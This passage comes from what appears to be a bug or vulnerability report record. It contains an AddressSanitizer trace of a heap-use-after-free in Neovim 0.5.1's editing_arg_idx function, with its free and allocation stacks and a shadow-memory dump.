/home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1823:3\n #4 0x8b7606 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2039:11\n #5 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #6 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #7 0x8c1e99 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:3061:5\n #8 0x8beab8 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2633:14\n #9 0x8bf090 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2614:3\n #10 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #11 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #12 0x8d0ee3 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:287:10\n #13 0xa936ce in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1731:5\n #14 0xa8bad0 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:508:5\n #15 0x7fa9a9b05082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #16 0x45de8d in _start (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.5.1-ASAN+0x45de8d)\n\n0x627000015100 is located 0 bytes inside of 12248-byte region [0x627000015100,0x6270000180d8)\nfreed by thread T0 here:\n #0 0x4d634d in free (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.5.1-ASAN+0x4d634d)\n #1 0xb32744 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:121:3\n #2 0x65757b in free_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:794:5\n #3 0x653990 in close_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:625:5\n #4 0x67df86 in wipe_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5671:3\n #5 0x67de5c in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5650:5\n #6 0x9b5c91 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4839:51\n #7 0x8830fc in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2410:13\n #8 0x8fcb6d in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7361:9\n #9 0x910588 in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7286:3\n #10 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #11 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #12 0x8c1e99 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:3061:5\n #13 0x8beab8 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2633:14\n #14 0x8bf090 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2614:3\n #15 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #16 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #17 0x8d0ee3 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:287:10\n #18 0xa936ce in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1731:5\n #19 0xa8bad0 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:508:5\n #20 0x7fa9a9b05082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\npreviously allocated by thread T0 here:\n #0 0x4d6742 in calloc (/home/zzw/Desktop/EXE/nvim_exe/nvim-0.5.1-ASAN+0x4d6742)\n #1 0xb327de in xcalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:135:15\n #2 0x65c34c in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1783:11\n #3 0x67dabf in buf_contents_changed /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:5616:19\n #4 0x9b5c91 in buf_check_timestamp /home/zzw/Desktop/neovim/build/../src/nvim/fileio.c:4839:51\n #5 0x8830fc in do_ecmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:2410:13\n #6 0x8fcb6d in do_exedit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7361:9\n #7 0x910588 in ex_edit /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:7286:3\n #8 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #9 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #10 0x8c1e99 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:3061:5\n #11 0x8beab8 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2633:14\n #12 0x8bf090 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2614:3\n #13 0x8db155 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1969:5\n #14 0x8cd4f2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:599:20\n #15 0x8d0ee3 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:287:10\n #16 0xa936ce in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1731:5\n #17 0xa8bad0 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:508:5\n #18 0x7fa9a9b05082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1843:31 in editing_arg_idx\nShadow bytes around the buggy address:\n 0x0c4e7fffa9d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffa9e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffa9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffaa00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c4e7fffaa10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x0c4e7fffaa20:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffaa30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffaa40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffaa50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffaa60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0c4e7fffaa70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==4291==ABORTING", "creation_timestamp": "2026-06-13T13:17:19.000000Z"}